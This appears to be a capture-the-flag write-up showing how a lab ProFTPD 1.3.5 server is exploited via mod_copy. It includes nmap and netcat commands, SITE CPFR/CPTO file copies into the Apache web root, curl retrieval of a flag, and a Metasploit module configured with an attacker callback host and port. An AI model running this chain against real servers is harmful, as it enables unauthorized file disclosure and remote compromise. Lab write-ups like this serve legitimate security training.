This write-up documents the full exploitation chain used to discover and extract a hidden flag from a vulnerable ProFTPD 1.3.5 server using the mod_copy feature.

πŸ” 1. Initial Reconnaissance

We began by scanning the target to identify open services.

nmap -sV 172.20.50.54

Findings:

  • Port 21/tcp open β†’ FTP service
  • Service: ProFTPD 1.3.5

This version is known to be vulnerable when mod_copy is enabled.

πŸ”Ž 2. Deeper Service Enumeration

We confirmed FTP details:

nmap -sV -p 21 172.20.50.54

Output:

ProFTPD 1.3.5 Server (Default Installation)

We attempted anonymous login:

ftp 172.20.50.54

Result:

  • Anonymous login ❌ failed

This suggested restricted authentication but did not rule out misconfigured FTP commands.

⚠️ 3. Testing FTP Command Behavior

We connected using netcat to test manual FTP commands:

nc 172.20.50.54 21

Server responded:

220 ProFTPD 1.3.5 Server

We tested basic commands:

ls
cat /tmp/test.txt

Response:

500 Invalid command

This indicated:

  • Limited command parsing
  • But FTP command interface still active

πŸ”“ 4. Discovery of mod_copy Misconfiguration

While interacting with FTP, we discovered support for:

SITE CPFR
SITE CPTO

This is the mod_copy feature, which allows file copying directly on the server.

πŸš€ 5. Exploitation (Manual Method)

We attempted to copy sensitive files:

SITE CPFR /secret.txt
SITE CPTO /tmp/secret.txt

Result:

250 Copy successful

We confirmed the file was copied successfully.

🌐 6. Web Server Enumeration

We checked the HTTP service:

curl http://172.20.50.54/

Result:

  • Apache2 Debian Default Page
  • Document root likely: /var/www/html

We tested file access:

curl http://172.20.50.54/tmp/secret.txt

❌ Not found (because /tmp is not web-accessible)

🎯 7. Correct Exploitation Path

We redirected the file into the Apache web directory:

SITE CPFR /secret.txt
SITE CPTO /var/www/html/secret.txt

βœ”οΈ Copy successful

πŸ“‘ 8. Flag Retrieval

Once placed in the web root, the file became accessible via HTTP:

curl http://172.20.50.54/secret.txt

🏁 Flag:

Tyrannosaurus

🧠 9. Metasploit Attempt (Alternative Approach)

We also attempted exploitation using Metasploit:

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS 172.20.50.54
set RPORT_FTP 21
set LHOST 10.8.48.79
set LPORT 5555
exploit

Result:

  • Exploit partially executed
  • Payload failed due to:
  • incorrect writable path assumptions
  • missing execution conditions
  • web root restrictions

πŸ‘‰ Conclusion: manual exploitation was more reliable in this case.

πŸ“Œ Final Attack Chain Summary

  1. Scan target β†’ discovered FTP (ProFTPD 1.3.5)
  2. Tested login β†’ anonymous login failed
  3. Discovered mod_copy support
  4. Used SITE CPFR / CPTO to copy files
  5. Identified Apache web root (/var/www/html)
  6. Copied /secret.txt into web directory
  7. Retrieved flag via HTTP

πŸ›‘οΈ Lessons Learned

  • mod_copy misconfiguration = critical file disclosure risk
  • FTP services should NEVER allow arbitrary file copy operations
  • Web root directories must not be writable by external services
  • Always verify service versions for known CVEs (like CVE-2015–3306)

πŸ”₯ Takeaway

This challenge demonstrates how a simple FTP misconfiguration can lead to full sensitive file disclosure without needing complex exploits or reverse shells β€” just protocol abuse and proper enumeration.